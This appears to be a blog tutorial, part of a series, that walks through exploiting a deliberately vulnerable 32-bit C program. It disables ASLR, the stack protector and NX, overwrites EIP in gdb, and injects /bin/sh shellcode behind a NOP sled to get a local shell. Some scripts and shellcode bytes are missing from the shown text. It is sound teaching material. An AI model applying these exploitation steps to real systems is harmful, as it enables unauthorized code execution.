By this third article of the Buffer Overflow series we should be familiar with:
- memory segmentation,
- buffer overflow,
- assembly and disassembly
In this article we will details how to exploit a buffer overflow in order to achieve remote code execution via shellcode injection.
As previously stated in the introduction, today’s memory layout of a running application has become significantly more complex due to the implementation of various security measures. These measures have made exploiting vulnerabilities such as buffer overflow quite challenging. Some of the common and highly effective security measures include for example:
- ASLR protection (Address Space Layout Randomization) randomly arranges the address space positions of key data areas of a program. At each new execution, the stored data is placed in different memory spaces.
- SSP protection (Stack-Smashing Protector) detects stack buffer overrun by aborting if a secret value on the stack is changed. These secret values (”Canaries”) are inserted between data segments in the stack. The integrity of the secrets are checked and the program immediately interrupt if modification is detected.
- No possible Stack or Heap execution, these memory spaces are intended to only contain variables and pointers but never executable code.
For the learning purpose of our example, we are going to disable these protections and force a 32 bits compilation.
[hg8@archbook ~]$ sudo echo 0 > /proc/sys/kernel/randomize_va_space # disable ASLR
-m32: Compile in 32 bits
-g: Generates debug information to be used by GDB debugger.
-mpreferred-stack-boundary=2: Ensure that the stack is set up into 4-bytes increments, preventing optimisation of the stack segmentation that could make our example confusing.
-fno-stack-protector: Disable Stack Smashing protection.
-z execstack: Disable NX (allowing stack segment to be executable).
Let’s now open our program with
[hg8@archbook ~]$ gdb ./vuln
In the previous article, the disassembly of our example program allowed us to understand what our program stack will looks like:
In order to exploit the buffer overflow in our program, we are going to pass an input bigger than 500 characters to our
It’s important to note that, even though the stack itself grows upward from high-memory to lower-memory addresses, the buffer itself is filled from lower to higher memory addresses.
In our example, when we input a string longer than 500 characters, it will begin overwriting the register that’s lower on the stack (and higher up in the memory).
For example if we use a 501 characters long input, the following will happen:
Well let’s now see in practice what happens when we input a 501 long string to our program.
We can use python to generate a string made of 501 occurrences of the letter ‘A’ (
0x41 is hexadecimal for 65, which is the ASCII-code for the letter ‘A’).
gdb this can be done using the
[hg8@archbook ~]$ gdb ./vuln
Nothing happens, it’s normal since EBX is not a critical register in our example program.
Let’s now add a breakpoint in order to highlight how the EBX register got overwritten with an extra
(gdb) disassemble main
Now by checking the registers with the
info registers commands we can verify that the
ebx address is being overwritten:
By inputting a 504 character long string, we overwrite the whole
(gdb) run $(python -c "print('\x41'*504)")
We can also visualize what the stack looks like in memory from gdb with
x/12x $sp-20. Let’s decompose the command to understand how it works:
x/14xdisplays 14 bytes of memory in a hexadecimal format.
$sp+460starts the memory reading from the stack pointer ($sp) position offset by +460, which is around where our
ebxregister is located.
Beforehand let’s slightly tweak our payload to make it more visible on the stack representation, instead of ‘A’ we will replace the 4 overflowed bytes with ‘B’ (
(gdb) run $(python -c "print('\x41'*500+'\x42'*4)")
Now let’s overwrite every register following our buffer,
ebx with ‘BBBB’,
ebp with ‘CCCC’ and
eip with ‘DDDD’:
(gdb) run $(python -c "print('\x41'*500+'\x42'*4+'\x43'*4+'\x44'*4)")
Our stack now looks like this:
We achieved full control of adjacent memory registers. So what can we do with such access ? Let’s move on to exploitation.
The last register we manage to overwrite is
The EIP register holds the “Extended Instruction Pointer” for the stack. In other words, it tells the computer where to go next to execute the next command and controls the flow of a program.
This means that if we can input malicious code into the program, we can use the buffer overflow to overwrite the
eip register to point to the memory address of the malicious code.
And that’s exactly what we are going to do now, and we will start by crafting a shellcode.
First of all, what is a shellcode ?
A shellcode is a small piece of code used as payload when exploiting an overflow vulnerability. Historically it’s called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine.
In our case, we will inject a shellcode into our buffer in order to have it get executed later on.
Wikipedia defines the writing of shellcode “as much of an art as it is a science”, since shellcode depends on the operating system, CPU architecture and is commonly written in Assembly.
You can easily find plenty on the internet. For our example we are going to use a very common and simple shellcode for x86 which executes a
Here is a quick overview of this shellcode:
xor eax, eax ; put 0 into eax
This code can be assembled and linked using
nasm to create an executable binary program as an Executable and Linking Format (ELF) binary:
[hg8@archbook ~]$ nasm -f elf shellcode.asm
Now we need to disassemble it in order to get the shellcodes bytes:
[hg8@archbook ~]$ objdump -d -M intel shellcode.o
We can now easily extract the hexadecimal shellcode, either by hand or with some bash-fu:
[hg8@archbook ~]$ objdump -d ./shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Now to be sure our shellcode works, let’s write a simple program to run it on our machine:
Let’s run it:
[hg8@archbook ~]$ gcc -m32 -z execstack shellcode-loader.c -o shellcode-loader
All is good, let’s now inject the shellcode into our vulnerable program.
We now need to make our vulnerable program execute our shellcode. To do so we will inject the shellcode in the input data payload, for it to be stored in our buffer.
The next step will be to have our return address point to the memory location where our shellcode is stored in order for it to be executed.
Since memory may change a bit during program execution and we don’t know the exact location of our shellcode we will use the NOP-sled technique.
A NOP sled, also known as a NOP slide, is a technique used to help ensure that a shellcode is executed even if the exact memory location of the exploit payload is not known.
The NOP, or No-Operation, instruction is a machine language instruction that performs no operation and takes up one machine cycle. NOP sled takes advantage of this instruction by creating a sequence of NOP instructions that can serve as a landing pad for the program execution flow.
We will craft a sequence of NOP instructions followed by our shellcode. The idea is that if the execution flow is redirected to any point within the NOP sled, the CPU will execute the NOP instructions and keep moving forward until it hits the shellcode.
When utilizing a NOP-sled, the precise location of the shellcode within the buffer doesn’t matter for the return address to reach it. What we do know is that it will reside somewhere within the buffer, and its length will be 25 bytes.
With our shellcode of 25 bytes and a payload of 512 bytes, we have 487 bytes to fill with NOP, which we will divide like so:
[ NOP SLED] [ SHELLCODE ] [ RETURN ADDRESS ]
We will use a Python script to craft our exploit, since we use Python 3 it’s important to use
In addition, since we are working on x86, the hexadecimal value for NOP instructions is
Since we don’t know for now what the return address (
eip) will be, we currently replace it with
x43) that we repeat 10 times to have a bit of padding between our shellcode and the stack.
Our NOP sled is being repeated 447 times since we need to write 512 bytes to overwrite the return address:
512 - (4 * 10) - 25 = 447
Here is what we expect our memory to looks like after execution of our payload:
Let’s run our payload:
[hg8@archbook ~]$ gdb ./vuln
We get exactly what we were looking for, a segmentation fault since we didn’t provide a valid return address yet. Let’s now inspect our memory to define what the return address should be.
When inspecting the memory, we can see our payload was injected as expected:
Let’s now pick any memory address within the
x90 NOP sled area before the shellcode to be our return address. From the screenshot above we can pick
0xffffce30 for example.
Since Intel CPUs are little endian, we need to reverse the address for our payload.
Our script become:
If everything goes fine, our program
strcpy will copy our string, and when it will try to return it will load our injected return value, redirecting to the NOP Sled, followed by the shellcode that will then be executed.
Let’s give it a try:
[hg8@archbook ~]$ gdb ./vuln
And here we go! The buffer overflow was successfully exploited, resulting in obtaining access to a command shell.
- Stack Smashing Protector
- Address space layout randomization
- Understanding stack alignment enforcement
- Buffer Overflow - Exploitation
- Buffer Overflow - Protective Countermeasures
- Data structure alignment
- How to look at the stack with gdb
- Writing Shellcode for Linux and *BSD
- Linux Shellcode 101: From Hell to Shell
- Linux/x64 - execve(/bin/sh) Shellcode (23 bytes)
- Two basic ways to run and test shellcode
- Running a Buffer Overflow Attack - Computerphile